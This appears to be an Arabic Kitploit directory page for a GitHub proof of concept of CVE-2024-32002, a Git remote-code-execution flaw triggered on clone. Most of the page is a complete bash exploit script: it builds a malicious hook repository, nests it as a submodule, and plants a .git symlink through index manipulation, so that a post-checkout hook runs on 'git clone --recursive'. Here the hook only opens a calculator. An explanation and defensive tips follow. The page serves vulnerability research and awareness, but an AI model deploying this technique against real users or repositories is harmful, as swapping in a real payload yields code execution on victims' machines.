Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-32002-poc — CVE-2024-32002 هو ثغرة خطيرة في Git تسمح للمهاجم بتنفيذ تعليمات برمجية عن بُعد (RCE) عند قيام المستخدم بتنفيذ عملية git clone. | Kitploit
أدوات/GitHubGitHub/bohemianhacks/cve-2024-32002-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubbohemianhacks/cve-2024-32002-poc

CVE-2024-32002-poc

CVE-2024-32002 هو ثغرة خطيرة في Git تسمح للمهاجم بتنفيذ تعليمات برمجية عن بُعد (RCE) عند قيام المستخدم بتنفيذ عملية git clone.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
11منذ سنة واحدةلم تتم المراجعة بعد

سكريبت Bash:

root@kitploit:~
#!/bin/bash

# Set Git configuration options
git config --global protocol.file.allow always
git config --global core.symlinks true
# Avoid warning messages (set default branch to main)
git config --global init.defaultBranch main 

# Define tell-tale path
tell_tale_path="$PWD/tell.tale"

# Initialize hook repository
git init hook
cd hook
mkdir -p y/hooks

# Write malicious code to hook, compatible with Windows and macOS
cat > y/hooks/post-checkout <<EOF
#!/bin/bash
calc.exe
open -a Calculator.app
EOF

# Make hook executable: important
chmod +x y/hooks/post-checkout

git add y/hooks/post-checkout
git commit -m "post-checkout"

cd ..

# Define hook repository path
hook_repo_path="$(pwd)/hook"

# Initialize captain repository
git init captain
cd captain
git submodule add --name x/y "$hook_repo_path" A/modules/x
git commit -m "add-submodule"

# Create symbolic link
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "add-symlink"
cd ..

# Local testing (not needed for GitHub)
git clone --recursive captain hooked

شرح مبسط:

يقوم سكريبت Bash هذا بإنشاء مستودع Git خبيث يستغل ثغرة أمنية (CVE-2024-32002) لتنفيذ تعليمات برمجية ضارة عند استنساخ شخص ما للمستودع.

إليك تفصيل لما يفعله السكريبت:

  1. ضبط إعدادات Git: تمكين بعض الميزات اللازمة للهجوم.
  2. إنشاء مستودع hooks خبيث: يحتوي هذا المستودع على سكريبت مخفي سيتم تشغيله عند استنساخه.
  3. إنشاء مستودع مخادع: هذا المستودع، المسمى "captain"، يبدو غير ضار ولكنه يحتوي سرًا على مستودع hooks الخبيث كوحدة فرعية (submodule).
  4. إضافة رابط رمزي: تُستخدم هذه الخدعة لإخفاء hook الخبيث وجعله يُنفذ عند استنساخ المستودع.

عندما يستنسخ شخص ما مستودع "captain"، سيتم تشغيل السكريبت الخبيث على جهازه، مما قد يؤدي إلى عواقب ضارة مثل:

  • تثبيت برامج ضارة: يمكن للسكريبت تنزيل وتثبيت برامج ضارة.
  • سرقة البيانات: قد يسرق معلومات حساسة من جهاز الضحية.
  • اختراق النظام: يمكن للسكريبت الحصول على وصول غير مصرح به إلى النظام.

لحماية نفسك من مثل هذه الهجمات:

  • حافظ على تحديث عميل Git الخاص بك: تأكد من أن لديك أحدث إصدار لمعالجة الثغرات الأمنية.
  • كن حذرًا عند استنساخ المستودعات: استنسخ المستودعات فقط من مصادر موثوقة.
  • استخدم برنامج مكافحة فيروسات موثوقًا: يمكن أن يساعد ذلك في اكتشاف وحظر البرامج الضارة.
  • كن على دراية بهجمات التصيد: تجنب النقر على الروابط المشبوهة أو تنزيل الملفات من مصادر غير معروفة.

باتباع هذه الاحتياطات، يمكنك تقليل مخاطر الوقوع ضحية لهجمات مماثلة بشكل كبير.

تنزيل الأداة